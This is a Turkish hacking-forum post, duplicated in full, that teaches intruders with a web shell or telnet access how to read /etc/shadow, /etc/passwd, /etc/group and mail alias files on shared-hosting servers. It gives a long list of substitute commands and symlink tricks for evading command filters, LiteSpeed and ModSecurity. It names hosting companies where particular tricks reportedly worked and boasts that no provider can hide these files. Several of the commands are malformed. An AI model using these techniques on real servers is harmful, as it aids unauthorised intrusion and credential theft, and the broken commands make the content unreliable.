Merhaba bügün size komut shell yada telnet ile etc okuma komutlarini göstericem ayni taktikle symlink(symbolic)'te okuyabilirsiniz tabi bazi izinlerin açik olmasi gerekiyor (sym) için . ama her türlü ETC okursunuz.Bu komutlarin nerdeyse %95'ini paylaştim bukadar komut trde yok hepsi birbirinin copy pastesi.
bazi serverlerde bütün komutlar engelli oluyor genellikle cat - more - less falan filan. tabi security expertlerin bilmedigi komutlar var mesela isimtescil'de cat -n ile config okunuyordu yada yetkinhostingde güzelnet'te head -n ile okunuluyordu geçen sene taktik size kalmiş
.
ilk siz /etc/shadow okuyun eğer perm verirse passwd okursunuz.
eğer passwd okunmuyorsa /etc/group okuyabilirsiniz.
komut shellimizdedeki kodlar'i veriyorum size :
komutlara "-n"de ekleyebilirsiniz tabi hepsine degil ilk 10 koda ekleyebilirsiniz. örnek:cat -n /etc/passwd
ayni şekil -v ve -e ve -s -u komutuylada okuabilirsiniz araplardan çaldik bunuda amk zaten arapçada biliyorum degilmi ?
yada bazi komutlarda tail -c 100 /etc/passwd <> head -c 100 /etc/passwd diye okuyabilirsiniz.
head /etc/passwd
paste /etc/passwd
vi /etc/passwd
more /etc/passwd
tac /etc/passwd
less /etc/passwd
tail /etc/passwd
rev /etc/passwd
xxd /etc/passwd /etc/passwd
awk -F: ‘{ print $1 }’ /etc*/passwd | sort
ls -l /etc/passwd
cut -f 1,7 -d: /etc/passwd
awk -F: ‘{ print $1 ” “$2 ” ” $3″ “$4″ “$5 ” “$6″ “$7″ “}’ /etc*/passwd | sort
cd /etc;cat passwd
cat /etc/valiases/xxx.com
awk -F”:” ‘{ print “user****: ” $1 “\t\tuid:” $3 }’ /etc/passwd
grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 ** print $1}’
bunlarla ekrana yansitabilir
ln -s /etc/passwd 1.txt
ln -b /etc/passwd 1.txt
ln -v /etc/passwd 1.txt
cut -d /etc/passwd >> 1.txt
cp /etc/passwd >> 1.txt
head -n /etc/passwd >> 2.txt şeklindede yazdirabilirsiniz.
cat , less - ,vb vb şeklindede yazdirabilirsiniz.
tabi bilmeyenler için söylüyorum >> ve 1.txt şeklindeki komutlar ekrana yansitmaz yeni dosyaya yazar ya siz o dosyayi okursunuz yada indirirsiniz.
sunucu firmasi /etc/passwd dosyasini sizden saklayamaz her türlü sike sike okursunuz tek sıkıntı symbolic (SYMLİNK) Güvenligi (perm,) yada firewall güvenligi ile (litespeed,modsecurity) ile saklar onlar içinde bazi okuma methodlari var.
bazi serverlerde bütün komutlar engelli oluyor genellikle cat - more - less falan filan. tabi security expertlerin bilmedigi komutlar var mesela isimtescil'de cat -n ile config okunuyordu yada yetkinhostingde güzelnet'te head -n ile okunuluyordu geçen sene taktik size kalmiş
.
View hidden content is available for registered users!
ilk siz /etc/shadow okuyun eğer perm verirse passwd okursunuz.
eğer passwd okunmuyorsa /etc/group okuyabilirsiniz.
komut shellimizdedeki kodlar'i veriyorum size :
komutlara "-n"de ekleyebilirsiniz tabi hepsine degil ilk 10 koda ekleyebilirsiniz. örnek:cat -n /etc/passwd
ayni şekil -v ve -e ve -s -u komutuylada okuabilirsiniz
araplardan çaldik bunuda amk zaten arapçada biliyorum degilmi ? yada bazi komutlarda tail -c 100 /etc/passwd <> head -c 100 /etc/passwd diye okuyabilirsiniz.
head /etc/passwd
paste /etc/passwd
vi /etc/passwd
more /etc/passwd
tac /etc/passwd
less /etc/passwd
tail /etc/passwd
rev /etc/passwd
xxd /etc/passwd /etc/passwd
awk -F: ‘{ print $1 }’ /etc*/passwd | sort
ls -l /etc/passwd
cut -f 1,7 -d: /etc/passwd
awk -F: ‘{ print $1 ” “$2 ” ” $3″ “$4″ “$5 ” “$6″ “$7″ “}’ /etc*/passwd | sort
cd /etc;cat passwd
cat /etc/valiases/xxx.com
awk -F”:” ‘{ print “user****: ” $1 “\t\tuid:” $3 }’ /etc/passwd
grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 ** print $1}’
bunlarla ekrana yansitabilir
ln -s /etc/passwd 1.txt
ln -b /etc/passwd 1.txt
ln -v /etc/passwd 1.txt
cut -d /etc/passwd >> 1.txt
cp /etc/passwd >> 1.txt
head -n /etc/passwd >> 2.txt şeklindede yazdirabilirsiniz.
cat , less - ,vb vb şeklindede yazdirabilirsiniz.
tabi bilmeyenler için söylüyorum >> ve 1.txt şeklindeki komutlar ekrana yansitmaz yeni dosyaya yazar ya siz o dosyayi okursunuz yada indirirsiniz.
sunucu firmasi /etc/passwd dosyasini sizden saklayamaz her türlü sike sike okursunuz tek sıkıntı symbolic (SYMLİNK) Güvenligi (perm,) yada firewall güvenligi ile (litespeed,modsecurity) ile saklar onlar içinde bazi okuma methodlari var.
Last edited:
